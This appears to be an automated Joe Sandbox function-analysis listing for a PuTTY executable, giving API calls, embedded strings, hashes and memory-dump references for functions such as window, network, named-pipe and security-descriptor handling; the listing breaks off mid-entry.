                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Menu$DeleteInsert$AppendCreatePopup
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/window.c$IDM_SPECIAL_MIN + 0x10 * i < IDM_SPECIAL_MAX$S&pecial Command$nesting < 2
                                                          • API String ID: 1803796953-2454782107
                                                          • Opcode ID: 7a7983d97ad1ae08afb4cb975645954fe395e8b189463a545bd29cec1b93c837
                                                          • Instruction ID: 9c9e000af62aad5934885bac70a9d3184c205ba802c132956b7efb7425a0e421
                                                          • Opcode Fuzzy Hash: 7a7983d97ad1ae08afb4cb975645954fe395e8b189463a545bd29cec1b93c837
                                                          • Instruction Fuzzy Hash: F551E122B06666A1E790AB16E954F7AE359EF85BD4F804032DD0D03B90DF3FD841D714
                                                          Function 00007FF738A541A0 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 223windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: RectWindow$Dialog$MessageSend$CreateItemShow
                                                          • String ID: EDIT$STATIC
                                                          • API String ID: 2330346805-43825268
                                                          • Opcode ID: ba58d56f40ec5378fdec2c0a46fc70ca0ab38913529ac42da718d87cc61d687d
                                                          • Instruction ID: 30417b3c98559a38959f6193b55c773c320319eb5dbc06a3a68bdf59de136573
                                                          • Opcode Fuzzy Hash: ba58d56f40ec5378fdec2c0a46fc70ca0ab38913529ac42da718d87cc61d687d
                                                          • Instruction Fuzzy Hash: DDA199B26097818AE760DB16E8407ABF7A1FBC9B84F504126DACC47B58CF7DD485DB04
                                                          Function 00007FF738AFA3D0 Relevance: 21.3, APIs: 3, Strings: 9, Instructions: 337COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: _invalid_parameter_noinfo$Module$FileHandleName
                                                          • String ID: (Press Retry to debug the application - JIT must be enabled)$...$<program name unknown>$Assertion failed!$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Program:
                                                          • API String ID: 3031022502-1508414584
                                                          • Opcode ID: 09570fa23ba68efb34941cd3d8c30a62326323ae61197180eaa9df0580fc6c1e
                                                          • Instruction ID: 43e6fbf0684ff8852c61881cdf9ecf852fe4b17c5643b49a5cc8bcc8740ccd35
                                                          • Opcode Fuzzy Hash: 09570fa23ba68efb34941cd3d8c30a62326323ae61197180eaa9df0580fc6c1e
                                                          • Instruction Fuzzy Hash: 9BC1D693A0A34360FB20BB21AD00AFAD355AF11FC4FD04132CD4D56795EE7EF405A2AA
                                                          Function 00007FF738A31EF0 Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 332windowtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: CaptureCursorKeyboardMessageState$InfoLongMonitorReleaseSendShowTimeWindowZoomed
                                                          • String ID: (
                                                          • API String ID: 760066194-3887548279
                                                          • Opcode ID: b5e9ed695f54e348cec1fadcc705fd6205682a23e88342c596d13b3f2d747d95
                                                          • Instruction ID: 81bee4fdf2119f8f4583e19f069d560cd5024a40386a2fa0d19123aa00d61e65
                                                          • Opcode Fuzzy Hash: b5e9ed695f54e348cec1fadcc705fd6205682a23e88342c596d13b3f2d747d95
                                                          • Instruction Fuzzy Hash: 55D12637A0E29692F7B0AA34D144F7EF694EB84741F940035DA4A83685CFBFE841E725
                                                          Function 00007FF738A52CC0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 216windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Message$ItemSend$Window$ActiveBeepDestroyParentText
                                                          • String ID: %s Event Log
                                                          • API String ID: 1719468517-583241876
                                                          • Opcode ID: 700aeceea86c887274534bda84a76a58b4ed24eb6991e2b78f36445ccac973fa
                                                          • Instruction ID: 7b209ea287a6acbc8f89c00a530d0110d7791f06b2a0326c34da8eb3865f0e13
                                                          • Opcode Fuzzy Hash: 700aeceea86c887274534bda84a76a58b4ed24eb6991e2b78f36445ccac973fa
                                                          • Instruction Fuzzy Hash: C09105B3B09603A6FB50BB21E950B79E790BB48B84F840235DD4D07B94DE3EE5849329
                                                          Function 00007FF738A6B000 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 188networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: htonl$HandleInformationIoctlsocket
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/network.c$addr->addresses && step.curraddr < addr->naddresses$family == AF_UNSPEC
                                                          • API String ID: 156137457-2999384216
                                                          • Opcode ID: 55ac0c43cb6975455ce41a4fc862a4a323b8c1e5ebe4552c55d28620bd849686
                                                          • Instruction ID: 78f31eef9ff2cc2cdcc8fbb9cbb2cf60b43f128857090cfa0114ba2b7bc34637
                                                          • Opcode Fuzzy Hash: 55ac0c43cb6975455ce41a4fc862a4a323b8c1e5ebe4552c55d28620bd849686
                                                          • Instruction Fuzzy Hash: 7A810663B1960262FB60AB14D490B3AE7E0FF84750F858635DA2D437D4EF3EE8429318
                                                          Function 00007FF738A739C0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 120memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: DescriptorInitializeLocalSecurity$AllocateErrorFreeLast$AllocDaclOwner
                                                          • String ID: unable to allocate security descriptor: %s$unable to construct ACL: %s$unable to initialise security descriptor: %s$unable to set DACL in security descriptor: %s$unable to set owner in security descriptor: %s
                                                          • API String ID: 436594416-3066058096
                                                          • Opcode ID: 7cc0ad5134c731096eebbb189701258c81b8dbdaf4c70c06e0ae7ed183ae16af
                                                          • Instruction ID: eba4123d9b8a73cd6d6158d062ec650cdbfce102d5e517cfbf26d59169a7be6e
                                                          • Opcode Fuzzy Hash: 7cc0ad5134c731096eebbb189701258c81b8dbdaf4c70c06e0ae7ed183ae16af
                                                          • Instruction Fuzzy Hash: 20518C72A09A82A1FB20AF19E4557AAF3A0EFC5740F804131EA8D07790DF7FD445AB59
                                                          Function 00007FF738A697E0 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 167libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00007FF738A72CE0: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DAD
                                                            • Part of subcall function 00007FF738A72CE0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DF6
                                                          • GetProcAddress.KERNEL32 ref: 00007FF738A698A3
                                                            • Part of subcall function 00007FF738A69F80: CreateFileA.KERNEL32(?,?,?,?,?,?,?,00000000,00007FF738A69A4B), ref: 00007FF738A69FCD
                                                          • GetEnvironmentVariableA.KERNEL32 ref: 00007FF738A69995
                                                          • GetEnvironmentVariableA.KERNEL32 ref: 00007FF738A699AB
                                                          • GetWindowsDirectoryA.KERNEL32 ref: 00007FF738A69A15
                                                            • Part of subcall function 00007FF738A72FD0: RegQueryValueExA.ADVAPI32(?,?,?,?,?,00000001,00007FFE21E98EC0,00007FF738A69836), ref: 00007FF738A7300D
                                                            • Part of subcall function 00007FF738A72FD0: RegQueryValueExA.ADVAPI32 ref: 00007FF738A73054
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: CreateEnvironmentQueryValueVariable$AddressCloseDirectoryFileProcWindows
                                                          • String ID: HOMEDRIVE$HOMEPATH$RandSeedFile$SHGetFolderPathA$Software\SimonTatham\PuTTY$\PUTTY.RND$shell32.dll
                                                          • API String ID: 901926110-1528239033
                                                          • Opcode ID: 7d6d0d4450fc666840ba003d4b79b1a9fee8b32739d161a2738d5b702f6a9813
                                                          • Instruction ID: 6cf725926d9a83d28c9bbb70fed12ff19b0449d070587810bf79c5480551bd2a
                                                          • Opcode Fuzzy Hash: 7d6d0d4450fc666840ba003d4b79b1a9fee8b32739d161a2738d5b702f6a9813
                                                          • Instruction Fuzzy Hash: 4561C163B0E65361FA60B715A410BEAE3809F88794FC80131D94D47BDDEE7EE506E368
                                                          Function 00007FF738A3D740 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 150fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: File$Create$CloseCurrentDeleteErrorHandleLastPathProcessTempWrite
                                                          • String ID: %s::/%s.html>main$%s\putty_%lu_%llu.chm
                                                          • API String ID: 4085685679-1808412575
                                                          • Opcode ID: 26fb5b42aec2366dbaac9cef9246eadaa424f77e8e3f4b137e6446720c3c2745
                                                          • Instruction ID: 7d582718e953b0bd152563e620b3c793072d3ecae00ee6adf9195f860d4a550c
                                                          • Opcode Fuzzy Hash: 26fb5b42aec2366dbaac9cef9246eadaa424f77e8e3f4b137e6446720c3c2745
                                                          • Instruction Fuzzy Hash: 8A51D063A09643A5F610BB11F824B7AE760BB45BA4F845234DD5D03BC4CF7FE808A729
                                                          Function 00007FF738A38090 Relevance: 16.7, APIs: 11, Instructions: 188COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Object$Select$Create$DeleteLineMovePixelPolyline
                                                          • String ID:
                                                          • API String ID: 1020918164-0
                                                          • Opcode ID: ed2fa4786f405fbc84ded08fa9590d7d4109b6d49484d423a3de042f7789e337
                                                          • Instruction ID: 3679af242d3d0a9838f1bc4aee213dd106ac67208490258ddd492590e109b984
                                                          • Opcode Fuzzy Hash: ed2fa4786f405fbc84ded08fa9590d7d4109b6d49484d423a3de042f7789e337
                                                          • Instruction Fuzzy Hash: A6710733A1929646E754DF16E444B7AF7A8FB88B90F84013AEE0D43784DF7EE8419B04
                                                          Function 00007FF738A39730 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 159COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: RectWindowZoomed$ClientDesktopInfoInvalidateMonitor
                                                          • String ID: (
                                                          • API String ID: 3999421749-3887548279
                                                          • Opcode ID: 0409b4766def004f54faaaf23440837edeb77d12e507eaf40d0bd92904261e46
                                                          • Instruction ID: da2de684239fd703db5e16519e8cd721fc60667a527aced3820a7cf38a653d64
                                                          • Opcode Fuzzy Hash: 0409b4766def004f54faaaf23440837edeb77d12e507eaf40d0bd92904261e46
                                                          • Instruction Fuzzy Hash: B251CE63A0E64296FB24EB29E451B7AF3A0FB85740F880031DE4E43791DF7EE845D624
                                                          Function 00007FF738AD9D00 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 113pipeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Create$ErrorEventFormatLastMessageNamedPipe_set_error_mode
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/named-pipe-server.c$\\.\pipe\$strchr(pipename + 9, '\\') == NULL$strncmp(pipename, "\\\\.\\pipe\\", 9) == 0$unable to create named pipe '%s': %s
                                                          • API String ID: 3886136549-228966084
                                                          • Opcode ID: 2261427d2f6ee5233f72e83b6bd3cc082a74e4a875b275ed17d9b8f59572a44b
                                                          • Instruction ID: 258c0e31f86b97ed822c958a823c83949a7b74684a89c99bfc97f24f5476a090
                                                          • Opcode Fuzzy Hash: 2261427d2f6ee5233f72e83b6bd3cc082a74e4a875b275ed17d9b8f59572a44b
                                                          • Instruction Fuzzy Hash: 8751C133A09B42A2FB00AB11E5517BAF3A0FF45794F804135EA8C07B91EF3EE1659354
                                                          Function 00007FF738A73BE0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 84memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF738A73DC8), ref: 00007FF738A73C9D
                                                          • AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF738A73DC8), ref: 00007FF738A73D0B
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF738A73DC8), ref: 00007FF738A73D15
                                                            • Part of subcall function 00007FF738A73820: GetCurrentProcessId.KERNEL32 ref: 00007FF738A73860
                                                            • Part of subcall function 00007FF738A73820: OpenProcess.KERNEL32 ref: 00007FF738A73872
                                                            • Part of subcall function 00007FF738A73820: GetLastError.KERNEL32 ref: 00007FF738A738C3
                                                            • Part of subcall function 00007FF738A73820: LocalAlloc.KERNEL32 ref: 00007FF738A738E8
                                                            • Part of subcall function 00007FF738A73820: GetLengthSid.ADVAPI32 ref: 00007FF738A7391A
                                                            • Part of subcall function 00007FF738A73820: CopySid.ADVAPI32 ref: 00007FF738A7393E
                                                            • Part of subcall function 00007FF738A73820: CloseHandle.KERNEL32 ref: 00007FF738A73964
                                                            • Part of subcall function 00007FF738A73820: CloseHandle.KERNEL32 ref: 00007FF738A73974
                                                            • Part of subcall function 00007FF738A73820: LocalFree.KERNEL32 ref: 00007FF738A73982
                                                          • GetLastError.KERNEL32 ref: 00007FF738A73D2B
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF738A73DC8), ref: 00007FF738A73D41
                                                            • Part of subcall function 00007FF738A74050: FormatMessageA.KERNEL32(?,?,?,?,?,?,?,00000000,00007FF738A69A4B), ref: 00007FF738A740FB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$AllocateCloseHandleInitializeLocalProcess$AllocCopyCurrentFormatFreeLengthMessageOpen
                                                          • String ID: unable to construct SID for current user: %s$unable to construct SID for local same-user access only: %s$unable to construct SID for world: %s
                                                          • API String ID: 742050092-2222155745
                                                          • Opcode ID: 9606dc5468eceea1dd2b615bbe117ef4981d4f51b496b5841ee8758abb641360
                                                          • Instruction ID: d25af528d50d1255814c0ba2f9eeca8c6b2713270075fbf0a82f74542aac0644
                                                          • Opcode Fuzzy Hash: 9606dc5468eceea1dd2b615bbe117ef4981d4f51b496b5841ee8758abb641360
                                                          • Instruction Fuzzy Hash: 08418D73909642A6FB10AF60E45473AF7A0FB84304FD00139E68D46BA5DF7EE444EB29
                                                          Function 00007FF738A31160 Relevance: 13.8, APIs: 9, Instructions: 309COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: LongWindow
                                                          • String ID:
                                                          • API String ID: 1378638983-0
                                                          • Opcode ID: a64ef1ec528369584318b8163b0d0a72cfe950b3ed308f140b1cd266a3ac9cf3
                                                          • Instruction ID: ec37050edfce01fc3f287490345be7edebf23cd2775501bb574450643f661cac
                                                          • Opcode Fuzzy Hash: a64ef1ec528369584318b8163b0d0a72cfe950b3ed308f140b1cd266a3ac9cf3
                                                          • Instruction Fuzzy Hash: EFC10273A0A296A6EB60AB25D444BBEE394EF84740F940135EA0D83791DF7FE841E714
                                                          Function 00007FF738A73820 Relevance: 13.6, APIs: 9, Instructions: 111memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
